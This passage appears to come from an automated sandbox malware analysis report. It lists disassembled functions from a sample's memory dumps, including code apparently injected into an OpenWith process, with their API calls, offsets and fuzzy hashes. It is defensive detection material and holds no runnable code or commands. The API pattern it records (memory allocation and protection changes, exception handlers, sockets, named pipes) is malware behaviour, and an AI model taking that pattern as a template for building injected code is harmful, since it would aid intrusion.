                                              • GetLastError.KERNEL32(?,00C86AF4,00000000,?,00CA9C78,?,?,?,00C86C97,00000004,InitializeCriticalSectionEx,00CA2CC0,InitializeCriticalSectionEx,00000000,?,00C86A17), ref: 00C86B5A
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C86B82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID: api-ms-
                                              • API String ID: 3177248105-2084034818
                                              • Opcode ID: a4a6416243f0acdeef67e6444b1f917fe2c90c6be497611e1dc0b4305b13b15f
                                              • Instruction ID: 5a3ba4c341144544088c439c31b643791dc48272bce2bc46341893ff5235ab7f
                                              • Opcode Fuzzy Hash: a4a6416243f0acdeef67e6444b1f917fe2c90c6be497611e1dc0b4305b13b15f
                                              • Instruction Fuzzy Hash: BDE04830240215FBEF202B65DC06F6D3A55AB11B9DF104020FD0DE61E1D772D950DB59
                                              APIs
                                              • GetConsoleOutputCP.KERNEL32(A355C656,00000000,00000000,?), ref: 00C8DFE4
                                                • Part of subcall function 00C8B2B9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C8DC5F,?,00000000,-00000008), ref: 00C8B31A
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C8E236
                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C8E27C
                                              • GetLastError.KERNEL32 ref: 00C8E31F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                              • String ID:
                                              • API String ID: 2112829910-0
                                              • Opcode ID: 06411595a482694df0d698daa8f7aa2d3f9b34d90dd930c06644d3dcc885027b
                                              • Instruction ID: cd2cd2446b5adb3e234bb96c357330282338d8d72e5b472a0828f4e9e1ecb48e
                                              • Opcode Fuzzy Hash: 06411595a482694df0d698daa8f7aa2d3f9b34d90dd930c06644d3dcc885027b
                                              • Instruction Fuzzy Hash: A9D18A71D002589FCB15DFA8C880AEDBBB5FF09308F24452AE866EB251D730A941CB54
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AdjustPointer
                                              • String ID:
                                              • API String ID: 1740715915-0
                                              • Opcode ID: 035ab2966dd2c68f163c85f2a051aa424f347b2d05d80397a1ee1c7d23434513
                                              • Instruction ID: b16fc600604a7108474670f66450c27c4f1d5f08d0ba924144b6eee535c8cde6
                                              • Opcode Fuzzy Hash: 035ab2966dd2c68f163c85f2a051aa424f347b2d05d80397a1ee1c7d23434513
                                              • Instruction Fuzzy Hash: A751E572608602AFDB28AF15D849B7EB7A5EF4030CF34422DE819475A1F731ED80D798
                                              APIs
                                                • Part of subcall function 00C8B2B9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C8DC5F,?,00000000,-00000008), ref: 00C8B31A
                                              • GetLastError.KERNEL32 ref: 00C89F69
                                              • __dosmaperr.LIBCMT ref: 00C89F70
                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00C89FAA
                                              • __dosmaperr.LIBCMT ref: 00C89FB1
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                              • String ID:
                                              • API String ID: 1913693674-0
                                              • Opcode ID: 89f8b8a7287b480e136eabc3bb80545ac4cf6efe3ab8cefbe2667a069bdc8eaa
                                              • Instruction ID: 09181a2a71afddd6ce67027a66fd3b1a03ff58c8ee10a15291ea8edaaa0ed705
                                              • Opcode Fuzzy Hash: 89f8b8a7287b480e136eabc3bb80545ac4cf6efe3ab8cefbe2667a069bdc8eaa
                                              • Instruction Fuzzy Hash: C321F631604615BFDB24BFA6C88097BB7A9FF403AC7098529FA69C7200E730ED409769
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 00C8B364
                                                • Part of subcall function 00C8B2B9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C8DC5F,?,00000000,-00000008), ref: 00C8B31A
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C8B39C
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C8B3BC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                              • String ID:
                                              • API String ID: 158306478-0
                                              • Opcode ID: f95d842ec72af4efbe7b8f74f6b6e5a592a5e24904ceb612784aadbfcac56394
                                              • Instruction ID: 0e05af10d78dfa830e3b5a7cda759d45345fc2c74d7a6f9f60901d276bf6e1bb
                                              • Opcode Fuzzy Hash: f95d842ec72af4efbe7b8f74f6b6e5a592a5e24904ceb612784aadbfcac56394
                                              • Instruction Fuzzy Hash: 6511C0B2609616BFA61137B69CCAD7F696CDE853AC3110024FA01D2111EF60DE00A3B8
                                              APIs
                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C8EF14,00000000,00000001,00000000,?,?,00C8E373,?,00000000,00000000), ref: 00C8F76D
                                              • GetLastError.KERNEL32(?,00C8EF14,00000000,00000001,00000000,?,?,00C8E373,?,00000000,00000000,?,?,?,00C8E916,00000000), ref: 00C8F779
                                                • Part of subcall function 00C8F73F: CloseHandle.KERNEL32(FFFFFFFE,00C8F789,?,00C8EF14,00000000,00000001,00000000,?,?,00C8E373,?,00000000,00000000,?,?), ref: 00C8F74F
                                              • ___initconout.LIBCMT ref: 00C8F789
                                                • Part of subcall function 00C8F701: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C8F730,00C8EF01,?,?,00C8E373,?,00000000,00000000,?), ref: 00C8F714
                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00C8EF14,00000000,00000001,00000000,?,?,00C8E373,?,00000000,00000000,?), ref: 00C8F79E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                              • String ID:
                                              • API String ID: 2744216297-0
                                              • Opcode ID: 765d86b939dfce0fc6eed3f71abef189f308bd2f22499bb22f6645d8da45bdc7
                                              • Instruction ID: 5119cf6c6ff4aea32c5e8aed2c40b5444eb4883bc538e341b8b29ca843860150
                                              • Opcode Fuzzy Hash: 765d86b939dfce0fc6eed3f71abef189f308bd2f22499bb22f6645d8da45bdc7
                                              • Instruction Fuzzy Hash: FEF01C36001128BBCF222F96DC09B8E3F66FB0A3A8F114024FA1886120D6328921EB94
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 02720326
                                                • Part of subcall function 027200A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027200CD
                                                • Part of subcall function 027200A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02720279
                                              • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 02720378
                                              • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 027203E7
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02720407
                                              • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 0272042E
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02720456
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 02720471
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000003.1327127370.0000000002720000.00000040.00000001.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_3_2720000_OpenWith.jbxd
                                              Similarity
                                              • API ID: Virtual$Alloc$Free$ChangeCloseFileFindNotificationProtectView
                                              • String ID: ,
                                              • API String ID: 2870039258-3772416878
                                              • Opcode ID: 34919759cab89c45596a3336aca0d90db3a2564f30e7825e5c793611e7351f71
                                              • Instruction ID: 87aaf5334d7315dade746424b3f0b7bbbb3da8ed1472b65f6cab41f3b729bbaa
                                              • Opcode Fuzzy Hash: 34919759cab89c45596a3336aca0d90db3a2564f30e7825e5c793611e7351f71
                                              • Instruction Fuzzy Hash: 79611AB5900219EFDB20DFA9C984ADEBBB9FF18354F14C42AE959A7240D730E954CF60
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027200CD
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02720279
                                              Memory Dump Source
                                              • Source File: 0000000D.00000003.1327127370.0000000002720000.00000040.00000001.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_3_2720000_OpenWith.jbxd
                                              Similarity
                                              • API ID: Virtual$AllocFree
                                              • String ID:
                                              • API String ID: 2087232378-0
                                              • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                              • Instruction ID: ac5fa2144b5f9463c6d062c705db67bebeab23e09a61ad3b38609ae2b78110f1
                                              • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                              • Instruction Fuzzy Hash: 90719971E0425ADFDB41CF98C881BEEBBF0AB19314F284096E465FB241C334AA95CF64

                                              Execution Graph

                                              Execution Coverage:34.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:73.3%
                                              Total number of Nodes:30
                                              Total number of Limit Nodes:0
                                              execution_graph 409 1f664381cd0 411 1f664381cf5 409->411 410 1f664381f7d 411->410 422 1f6643815ac 411->422 413 1f664381e16 414 1f664381f74 FindCloseChangeNotification 413->414 415 1f664381f64 NtAcceptConnectPort 413->415 416 1f664381e5f RtlAllocateHeap 413->416 414->410 415->414 417 1f664381e7d 416->417 418 1f664381ea9 416->418 425 1f664380ac8 417->425 418->418 431 1f664381a90 NtAcceptConnectPort 418->431 424 1f6643815e0 NtAcceptConnectPort 422->424 424->413 426 1f664380c4b 425->426 427 1f664380ae8 425->427 426->418 427->426 427->427 428 1f664380bd1 NtAcceptConnectPort 427->428 428->426 429 1f664380c04 428->429 429->426 430 1f664380c1c NtAcceptConnectPort 429->430 430->426 432 1f664381c00 431->432 433 1f664381ae3 431->433 432->415 437 1f66438185c 433->437 435 1f664381afc 436 1f664381ba2 NtAcceptConnectPort RtlAddVectoredExceptionHandler 435->436 436->432 438 1f664381875 437->438 439 1f66438191c GetProcessMitigationPolicy 438->439 440 1f664381935 438->440 439->440 440->435 441 1f6643819a0 RtlRemoveVectoredExceptionHandler 442 1f6643819bf 441->442 443 1f6643819d2 VirtualFree 442->443 444 1f6643819e7 442->444 443->444

                                              Callgraph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort$DuplicateHandle_calloc_dbg
                                              • String ID: ,$H$H
                                              • API String ID: 2166852705-438696205
                                              • Opcode ID: 9fb62eb4d8959293fc2d40b19de36242d3d29fe68d1ba52932dcd9bec1ad6912
                                              • Instruction ID: 7f24081f1a051586425b28dfa20fbf69650cef5226eb57821f81074d02f2297c
                                              • Opcode Fuzzy Hash: 9fb62eb4d8959293fc2d40b19de36242d3d29fe68d1ba52932dcd9bec1ad6912
                                              • Instruction Fuzzy Hash: BB02723061CA889BD768DF58D8856AAB7E1FFD8301F50453FE58FC3291DA74A9418B82
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPathPort$??3@NameName_
                                              • String ID: $0$@
                                              • API String ID: 2039965879-2347541974
                                              • Opcode ID: d8fdb236a247b9205c502de8d0d979f89367b2180e7993cbf521bb03780d7e1e
                                              • Instruction ID: 4ad5cad61c48608c1ef6e791c9cf9a5bcbe8920bde35e5cdb481f2fa664fd290
                                              • Opcode Fuzzy Hash: d8fdb236a247b9205c502de8d0d979f89367b2180e7993cbf521bb03780d7e1e
                                              • Instruction Fuzzy Hash: 0B514D70528B889FD764DF28D8857AA77E0FF89714F10452FE58EC6241DB74E4858B83
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1431623286.000001F665D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F665D80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_1f665d80000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort$AllocateBoundaryDeleteDescriptorHeap
                                              • String ID:
                                              • API String ID: 3472209132-0
                                              • Opcode ID: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
                                              • Instruction ID: 58c0920b26298e81344ac014f07e0ba7206bb82c95b10629b20dcefd28170439
                                              • Opcode Fuzzy Hash: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
                                              • Instruction Fuzzy Hash: 90C15430618B499FDB58EF18D885BA9B7E1FBD8310F00562DE48EC7296DB34E845C786
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID: $0$@
                                              • API String ID: 1658770261-2347541974
                                              • Opcode ID: e038bc6975502a75aa15522c9d2aad796b46013016ac9629b0cf3dc02c1d6b17
                                              • Instruction ID: dcff11d0a0becf6e0c750c829e373bbbd451fc6a5a939130048135fade140711
                                              • Opcode Fuzzy Hash: e038bc6975502a75aa15522c9d2aad796b46013016ac9629b0cf3dc02c1d6b17
                                              • Instruction Fuzzy Hash: 4351293060CB899FE764DB68C894BABB7E4EFD8301F10452EE58AC2250DB79D4448B42

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.1740887784.000001F664380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F664380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1f664380000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptAllocateChangeCloseConnectFindHeapNotificationPort
                                              • String ID:
                                              • API String ID: 3171316915-0
                                              • Opcode ID: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
                                              • Instruction ID: ec9478fb73ce4f0de96cc5cd2e4b8460ef5a343edf851cfa665398ec6b077522
                                              • Opcode Fuzzy Hash: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
                                              • Instruction Fuzzy Hash: 64910730508E099FDB64EF1DC4817F5B7E1FB94320F14466EE49BD3296DA34E8868B81

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.1740887784.000001F664380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F664380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1f664380000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort$ExceptionHandlerMitigationPolicyProcessVectored
                                              • String ID:
                                              • API String ID: 1453854198-0
                                              • Opcode ID: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
                                              • Instruction ID: c1f00eb18d0c222a5bc9136956226498b987a5cca9654eb38f3fba95cca84879
                                              • Opcode Fuzzy Hash: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
                                              • Instruction Fuzzy Hash: 8741E230208B498FDB44DF2C98897E57BD1FB59320F0443AEE8AACB2D7DA34D9058795
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                              • String ID:
                                              • API String ID: 2502124517-0
                                              • Opcode ID: 584620923d8bee05c4cd2b55fbc688861300e251001a2660cae9de72a1f183dd
                                              • Instruction ID: 64b8bb67e79c3d72e16fa9ff115de49c8366427fd1cbc6ff9b5fd4f55434d9c6
                                              • Opcode Fuzzy Hash: 584620923d8bee05c4cd2b55fbc688861300e251001a2660cae9de72a1f183dd
                                              • Instruction Fuzzy Hash: 96316070608A888FD794EF28D8D87AA77E5FF94310F50463AD09BC61D0DF78D9858B81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0
                                              • API String ID: 0-4108050209
                                              • Opcode ID: d4dd2c9ec2e40b847152b417cb6d645fdeafd31ca8a11a7a04321dd5438b40c0
                                              • Instruction ID: 0a16067baa0cfda69170228bd0d7fe656eef65cb563b3f7caea63be36071dc7a
                                              • Opcode Fuzzy Hash: d4dd2c9ec2e40b847152b417cb6d645fdeafd31ca8a11a7a04321dd5438b40c0
                                              • Instruction Fuzzy Hash: BB218E31A0CA8C9FD754DE6988C476A76E1FFD8365F50093FE64AC3290D738A8848741
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0
                                              • API String ID: 0-4108050209
                                              • Opcode ID: 47ebd45c6b9b16ee77b28bcb10b07460bf5cba96d3288197dd2caf634787b8b3
                                              • Instruction ID: c8da03868d6437232c992927b5192eb6ac5cceb1f9f2d687622aac6bfa74ec3c
                                              • Opcode Fuzzy Hash: 47ebd45c6b9b16ee77b28bcb10b07460bf5cba96d3288197dd2caf634787b8b3
                                              • Instruction Fuzzy Hash: C9216031B1C98C5FE7949E9C98C867B7AE0EFD8351F60053FE64EC3250DB68A9848781
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotificationSuspendThread
                                              • String ID:
                                              • API String ID: 186804629-0
                                              • Opcode ID: ee8ed1484b309d5b480d9ed41d064abcb8b4e034361352156597246fbc6f772d
                                              • Instruction ID: 8a86c96654bc11ec4274cb1fb9ed9dcef36183e497c816d4b2a9390665e8f2d5
                                              • Opcode Fuzzy Hash: ee8ed1484b309d5b480d9ed41d064abcb8b4e034361352156597246fbc6f772d
                                              • Instruction Fuzzy Hash: B291C430A1CA599BEB68AB18DCD557A73E2FF85350B15417EE04FC7585CA38EC42CB82
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AllocInfoSystemVirtual
                                              • String ID:
                                              • API String ID: 3440192736-0
                                              • Opcode ID: 10974d638571623cb466fc5259723849182c6a649d453933aa228a33d07da908
                                              • Instruction ID: 2b7407fcada0607c5a85d6fa85a24d705a3bd514f1840473474b38f60778b389
                                              • Opcode Fuzzy Hash: 10974d638571623cb466fc5259723849182c6a649d453933aa228a33d07da908
                                              • Instruction Fuzzy Hash: CD51B33061CE5D5FE755AA6C98D876A72E2FB98340F05013AD44FC31A5EA68EC85C782

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.1740887784.000001F664380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F664380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1f664380000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 82f3aeb1d2454658223fb6d5b21d23051085e6a8eeabdc877af9343281df37cc
                                              • Instruction ID: 529b1f3278966b73b0e3478e8bc785bbce7651bc811b9ad45704ff92938c05ac
                                              • Opcode Fuzzy Hash: 82f3aeb1d2454658223fb6d5b21d23051085e6a8eeabdc877af9343281df37cc
                                              • Instruction Fuzzy Hash: B7417E30919A150EE338E62E88866BDFBE2F7D6319F30457EE4E7C6192D939C6438741
                                              APIs
                                              • socket.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF4218D41A9), ref: 00007DF4218D40B5
                                                • Part of subcall function 00007DF4218D3C98: ioctlsocket.WS2_32 ref: 00007DF4218D3CC4
                                              • bind.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF4218D41A9), ref: 00007DF4218D413A
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: bindioctlsocketsocket
                                              • String ID:
                                              • API String ID: 3555158474-0
                                              • Opcode ID: 1cbeedcb49cdd83f56073e3a9aa9cf65c2d138516cd5c7d59cce1983b39e0131
                                              • Instruction ID: e5571def06fb92fda6c82c017af66a03a9d489c2af5869dc7a9057e6070b630a
                                              • Opcode Fuzzy Hash: 1cbeedcb49cdd83f56073e3a9aa9cf65c2d138516cd5c7d59cce1983b39e0131
                                              • Instruction Fuzzy Hash: CE21D630708A444FEB4CAF78ECC966633E1EBA5325F10067AD82FC76D5DA289C058651
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 98531d878e0ad7d3d6690ce9736b63ba0a61470b6d8d195234036ffb9fe9491b
                                              • Instruction ID: 4f908b113eb82b0a6dafa4f7f01130a1368abbd4f328af3e9d12caf753a91fde
                                              • Opcode Fuzzy Hash: 98531d878e0ad7d3d6690ce9736b63ba0a61470b6d8d195234036ffb9fe9491b
                                              • Instruction Fuzzy Hash: 2E21EF3051CE489FDB49EB58D884B6677F1FBAD341F00462AE44AC36A4EBB5E984CB41
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 9166209b5f367574360b80d64ced2ea26e8fa752ef609ccd6263efb912702e76
                                              • Instruction ID: e0e2e66ba520bb9bb29ee18aa622c33f2e4a549b83833a4ac1ad260c9ec5cd5f
                                              • Opcode Fuzzy Hash: 9166209b5f367574360b80d64ced2ea26e8fa752ef609ccd6263efb912702e76
                                              • Instruction Fuzzy Hash: C921123151CA498FDB55EF58D888BA673F1FBE9341F00452EE44AC36A0DBB5E884CB41
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
